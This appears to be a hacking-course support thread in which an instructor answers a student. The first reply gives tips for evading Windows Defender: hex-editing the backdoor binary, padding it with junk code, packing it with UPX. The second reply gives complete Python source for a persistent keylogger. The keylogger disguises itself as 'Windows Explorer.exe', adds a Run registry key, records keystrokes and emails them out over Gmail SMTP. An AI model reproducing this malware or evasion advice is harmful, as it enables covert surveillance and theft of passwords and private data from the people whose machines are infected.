AJ

Hi Alison,

You have several options to bypass Windows defender, so you can:

1. Modify the backdoor executable after packaging using a hex editor, so you can use hexeditor <filename> that comes pre-installed in Kali, and try to modify some part of it, but please make sure that you don’t break the payload. Now Zaid does cover how to do this in the “Social Engineering” course, though you can check for more examples online to buildup on this as shown below:
https://null-byte.wonderhowto.com/how-to/hack-your-game-saves-basic-guide-hex-editing-0132155/
https://hackingandsecurity.blogspot.com/2016/03/fud-through-hex-editor-heading.html

2. Add some random data like various printing functions, statements, and by including new variable names to make the backdoor looks more unique, thus increasing the chance of generating a unique signature that can bypass Windows Defender signatures DB. Now, this seems daunting, but this process is a trial and error process, so you have to try to edit the code without breaking it after you package the backdoor python source code of the “klog_object.py”. You can also install upx to enhance the backdoor exe when you test it on nodistribute.com from
https://github.com/upx/upx/releases/

Now, this is covered in section 15, in which you will learn how to bypass a reasonable number of AV if you follow the same procedure and the above notes and resources.

Please let me know if you face any issues again. Thank you.

Hi Alison,

I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence and it worked. Please check the following source code, and try to use it for later debugging or if you want to buildup on this:

klog_object.py

#!/usr/bin/env python
import persistent_keylogger
my_keylogger = persistent_keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
my_keylogger.start()

Actual code of persistence_keylogger.py

#!/usr/bin/env python
import pynput.keyboard
import threading
import smtplib
import shutil
import os
import sys
import subprocess

class Keylogger:
	def __init__(self, time_interval, email, password):
    	        self.log = "Keylogger started"
		self.become_persistent()
	        self.interval = time_interval
	        self.email = email
	        self.password = password

	def become_persistent(self):
        	evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
        	if not os.path.exists(evil_file_location):
            	    shutil.copyfile(sys.executable, evil_file_location)
		    subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

	def append_to_log(self, string):
		self.log = self.log + string

	def process_key_press(self, key):
		try:
			current_key = str(key.char)
		except AttributeError:
			if key == key.space:
				current_key = " "
			else:
				current_key = " " + str(key) + " "
		self.append_to_log(current_key)

	def report(self):
		self.send_mail(self.email, self.password, "\n\n" + self.log)
		self.log = ""
		timer = threading.Timer(self.interval, self.report)
		timer.start()

	def send_mail(self, email, password, message):
		server = smtplib.SMTP("smtp.gmail.com", 587)
		server.starttls()
		server.login(email, password)
		server.sendmail(email, email, message)
		server.quit()

	def start(self):
		keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
		with keyboard_listener:
			self.report()
			keyboard_listener.join()

Note: Please note that I’ve changed the names of the file and tested the keylogger with my Gmail even after the target system has been restarted, but I put your name again for convenience, and that you put the correct file names for I changed them when I edited the above source code.

Please let me know how it goes. Thank you.